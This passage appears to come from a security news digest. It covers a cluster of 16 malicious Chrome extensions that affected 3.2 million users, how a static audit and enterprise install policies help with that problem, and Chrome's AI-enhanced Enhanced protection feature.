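A static audit like this cannot see what a background worker fetches from its configuration server at run time, which is where the malicious logic in this campaign actually lived; it narrows the list to the extensions that have the capabilities to do harm, which is what a review of several hundred installed extensions needs first. Enterprise fleets can pin that list with the ExtensionInstallAllowlist and ExtensionInstallBlocklist policies rather than relying on users to uninstall.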

Recommended read:
References :
  • bsky.app: GitLab's security team has discovered a cluster of 16 malicious Chrome extensions on the official Google Web Store. The extensions were used to insert ads and manipulate search engine results. Over 3.2 million users downloaded the extensions
  • gbhackers.com: A recent cybersecurity investigation has uncovered a cluster of 16 malicious Chrome extensions that have compromised at least 3.2 million users. These extensions, which include functionalities like screen capture, ad blocking, and emoji keyboards, were found to inject code into browsers, facilitating advertising and search engine optimization fraud.
  • Cyber Security News: Chrome Under Siege: 16 Malicious Extensions Infect Over 3.2 Million Users
  • thecyberexpress.com: Remove These Extensions Now! Hackers Hijack Google Chrome Add-ons for Fraud

@PCWorld //
Google Chrome has introduced a new layer of security, integrating AI into its existing "Enhanced protection" feature. This update provides real-time defense against dangerous websites, downloads, and browser extensions, marking a significant upgrade to Chrome's security capabilities. The AI integration allows for immediate analysis of patterns, enabling the identification of suspicious webpages that may not yet be classified as malicious.

This AI-powered security feature is an enhancement of Chrome's Safe Browsing. The technology apparently enables real-time analysis of patterns to identify suspicious or dangerous webpages. The improved protection also extends to deep scanning of downloads to detect suspicious files.

Recommended read:
References :
  • BleepingComputer: Google Chrome has updated the existing "Enhanced protection" feature with AI to offer "real-time" protection against dangerous websites, downloads and extensions.
  • PCWorld: Google Chrome adds real-time AI protection against dangerous content